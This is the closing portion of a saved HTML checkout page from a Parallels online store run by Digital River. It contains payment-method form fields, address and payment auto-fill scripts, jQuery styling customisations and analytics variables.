<option value="2021">2021</option>
</select>
</div>
<div class="dr_formLine" id="dr_ccSecurityCodeEntry">
<label class="dr_label" for="ccCode">Card Security Code:
<span class="dr_error">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardSecurityCode" value=""/>
<input name="cardSecurityCode" value="" id="cardSecurityCode" size="4" type="text"/>Click <a href="/store/para/en_US/DisplayPage/id.CardSecurityCodeInstructionsPage" onclick="popUp(this.href,'CardSecurityCode',550,550);return false;" target="_blank">here</a> for more information.</div>
<input type="hidden" name="ORIG_VALUE_saveMyCcEnabled" value="false"/>
<input name="saveMyCcEnabled" value="false" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_saveMyCc$$1001" value="off"/>
<input name="saveMyCc$$1001" value="off" type="hidden"/>
</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_Check">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1002" value="38"/>
<input name="paymentMethodID$$1002" value="38" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1002" value="Check"/>
<input name="name$$1002" value="Check" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1002" value=""/>
<input name="paymentMethodFee$$1002" value="" type="hidden"/>
<div class="dr_formLine" id="dr_CheckRadioSelect">
<label class="dr_label_paymentMethodName" for="Check">
<input type="radio" name="paymentMethodID" id="Check" value="38"/>
<strong class="dr_paymentOptionItem">Check</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCheck">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCheck">Follow the instructions on the "order completed" page to pay by check. Your order will be approved 3 days after we receive your payment.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_PayPalExpress">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1003" value="190000"/>
<input name="paymentMethodID$$1003" value="190000" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1003" value="PayPalExpress"/>
<input name="name$$1003" value="PayPalExpress" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1003" value=""/>
<input name="paymentMethodFee$$1003" value="" type="hidden"/>
<div class="dr_formLine" id="dr_PayPalExpressRadioSelect">
<label class="dr_label_paymentMethodName" for="PayPalExpress">
<input type="radio" name="paymentMethodID" id="PayPalExpress" value="190000"/>
<strong class="dr_paymentOptionItem">PayPal</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsPayPalExpress">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsPayPalExpress"><img border="0" id="dr_paypalExpressImage" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_paypalExp_logo.gif"/>Make a payment from your new or existing PayPal account. Be sure to use your PayPal login as your order email address.</div>
</div>
<div class="dr_paymentMethodBlock" id="dr_WireTransfer">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1004" value="37"/>
<input name="paymentMethodID$$1004" value="37" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1004" value="WireTransfer"/>
<input name="name$$1004" value="WireTransfer" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1004" value=""/>
<input name="paymentMethodFee$$1004" value="" type="hidden"/>
<div class="dr_formLine" id="dr_WireTransferRadioSelect">
<label class="dr_label_paymentMethodName" for="WireTransfer">
<input type="radio" name="paymentMethodID" id="WireTransfer" value="37"/>
<strong class="dr_paymentOptionItem">Wire Transfer</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsWireTransfer">details</a>)</span>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsWireTransfer">Follow the instructions on the "order completed" page to wire the money electronically from bank to bank. This process will take approximately 4-5 days. After we receive confirmation that our bank has received your funds, your order will be sent within the next two days.</div>
</div><script language="Javascript">function PaymentEntry(name, ccNum, expMonth, expYear, billingID){this.paymentNickName = name;this.cardNumber = ccNum;this.cardExpirationMonth = expMonth;this.cardExpirationYear = expYear;this.paymentOptionID = billingID;}var paymentList = new Array();function onPaymentChange(el, prefix){var idx = el.selectedIndex - 1;if (idx > -1) {var paymentEntry = paymentList[idx];setPaymentValues(prefix, paymentEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById('billingNickDiv').style.display = 'block';document.getElementById(prefix + 'Num').value = '';document.getElementById(prefix + 'NickName').value = '';document.getElementById(prefix + 'Month').value = '';document.getElementById(prefix + 'Year').value = '';} else if (selectedValue == 'FROM_REQ') {setPaymentValues(prefix, paymentAddress)}}}function setPaymentValues(prefix, PaymentEntry){document.getElementById(prefix + 'Method').value = PaymentEntry.paymentOptionID;document.getElementById(prefix + 'Num').value = PaymentEntry.cardNumber;document.getElementById(prefix + 'NickName').value = '';document.getElementById('billingNickDiv').style.display = 'none';document.getElementById(prefix + 'Month').value = PaymentEntry.cardExpirationMonth;document.getElementById(prefix + 'Year').value = PaymentEntry.cardExpirationYear;}</script></fieldset>
</div>
<input id="checkoutButton" type="image" class="dr_button" onClick="q=false" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continue_v2.gif"/><script language="Javascript">function AddressEntry(name1, name2, companyName, line1, line2, city, state, postalCode, country, phoneNumber, phoneNumber2, faxPhone){this.name1 = name1;this.name2 = name2;this.companyName = companyName;this.line1 = line1;this.line2 = line2;this.city = city;this.state = state;this.postalCode = postalCode;this.country = country;this.phoneNumber = phoneNumber;this.phoneNumber2 = phoneNumber2;this.faxPhone = faxPhone;}var shipToAddress = new AddressEntry('','','','','','','','','','','','');var addressList = new Array();function onAddressChange(el, prefix){var idx = el.selectedIndex - 2;if (idx > -1) {var addressEntry = addressList[idx];setAddressValues(prefix, addressEntry);} else {var selectedValue = el.options[el.selectedIndex].value;if (selectedValue == 'NEW') {document.getElementById(prefix + 'Name1').value = '';document.getElementById(prefix + 'Name2').value = '';document.getElementById(prefix + 'CompanyName').value = '';document.getElementById(prefix + 'Address1').value = '';document.getElementById(prefix + 'Address2').value = '';document.getElementById(prefix + 'City').value = '';document.getElementById(prefix + 'State').value = '';document.getElementById(prefix + 'PostalCode').value = '';document.getElementById(prefix + 'Country').value = '';document.getElementById(prefix + 'PhoneNumber').value = '';if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = '';}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = '';}} else if (selectedValue == 'FROM_REQ') {if (prefix == 'billing') {setAddressValues(prefix, billToAddress);} else if (prefix == 'shipping') {setAddressValues(prefix, shipToAddress);}}}}function setAddressValues(prefix, addressEntry){document.getElementById(prefix + 'Name1').value = addressEntry.name1;document.getElementById(prefix + 'Name2').value = addressEntry.name2;document.getElementById(prefix + 'CompanyName').value = addressEntry.companyName;document.getElementById(prefix + 'Address1').value = addressEntry.line1;document.getElementById(prefix + 'Address2').value = addressEntry.line2;document.getElementById(prefix + 'City').value = addressEntry.city;document.getElementById(prefix + 'State').value = addressEntry.state;document.getElementById(prefix + 'PostalCode').value = addressEntry.postalCode;document.getElementById(prefix + 'Country').value = addressEntry.country;document.getElementById(prefix + 'PhoneNumber').value = addressEntry.phoneNumber;if (document.getElementById(prefix + 'PhoneNumber2')) {document.getElementById(prefix + 'PhoneNumber2').value = addressEntry.phoneNumber2;}if (document.getElementById(prefix + 'FaxPhone')) {document.getElementById(prefix + 'FaxPhone').value = addressEntry.faxPhone;}}</script>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>
</div>








<script type="text/javascript">
if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}
</script>
<script type="text/javascript">
$(function(){
   $("div.dr_ExpandPaymentDetailsSection").hide();
   $("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
   });
   $(".dr_expandDetails").click(function(){
$(this).parent().parent().parent().children("div.dr_ExpandPaymentDetailsSection").toggle();
       return false;
   });
});
</script>
<script type="text/javascript">
function CDA_changeFormValue(formElemName,value){
for(i=0; i<document.forms.length; ++i){
formObj = document.forms[i];
formElem = formObj[formElemName];
if(formElem != null){
formElem.value = value;
}
}
}
</script>
<script type="text/javascript">
var now = new Date();
var wo = new Date(now.getFullYear(),0,1,0,0,0,0).getTimezoneOffset();
var so = new Date(now.getFullYear(),6,1,0,0,0,0).getTimezoneOffset();
var co = now.getTimezoneOffset();
var dst = true;
if(wo = so){
dst = false;
}
var value = 'WO=' + wo + '&SO=' + so + '&CO=' + co + '&DST=' + dst;
CDA_changeFormValue('CLS_DATA_ANALYTICS', value)
</script>

</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutAddressPaymentInfoPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>










































<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutAddressPaymentInfoPage';

</script>













   







<script type="text/javascript">





var fc_track = "billing";













































</script>
















   
   



   


